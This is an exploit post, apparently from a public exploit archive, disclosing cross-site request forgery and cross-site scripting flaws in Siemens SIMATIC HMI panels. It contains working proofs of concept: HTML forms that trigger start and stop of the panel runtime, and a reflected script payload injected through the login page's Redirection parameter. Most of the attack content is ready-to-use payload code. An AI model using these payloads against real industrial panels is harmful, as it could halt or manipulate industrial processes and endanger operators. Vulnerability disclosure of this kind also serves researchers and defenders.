Siemens SIMATIC Panels Cross Site Request Forgery / Cross Site Scripting

Multiple Siemens SIMATIC panels suffer from cross site request forgery and cross site scripting vulnerabilities.


MD5 | 52fd7f7488e289fc4a42c19a2bd6d53b

# Exploit Title: Siemens SIMATIC Panels Multiple Vulnerability
# Date: 18.05.2018
# Exploit Author: t4rkd3vilz
# Vendor Homepage: http://www.siemens.com/
# Version: Multiple SIMATIC Panels (TP, OP, MP, Mobile, Comfort)
# Greetz: Jameel Nabbo

CSRF PoC

<FORM METHOD="POST" ACTION="http://TargetIP/wwwSiemens
<http://targetip/wwwSiemens>">
<TD>
<INPUT TYPE="submit" VALUE="Start runtime" class="ad_button">
</TD>
<TD>
<INPUT TYPE="hidden" NAME="StartRt">

</TD>
</FORM>
</tr>
<tr>
<FORM METHOD="POST" ACTION="/wwwSiemens">
<TD>
<INPUT TYPE="submit" VALUE="Stop runtime" class="ad_button">
</TD>
<TD>
<INPUT TYPE="hidden" NAME="StopRt">
</TD>
</FORM>


And XSS PoC

http://TargetIP/Templates/Loginpage.html?Realm=FileBrowserUser&Redirection=
<http://targetip/Templates/Loginpage.html?Realm=FileBrowserUser&Redirection=>"/><svg/onload=prompt(/XSS/)>

Related Posts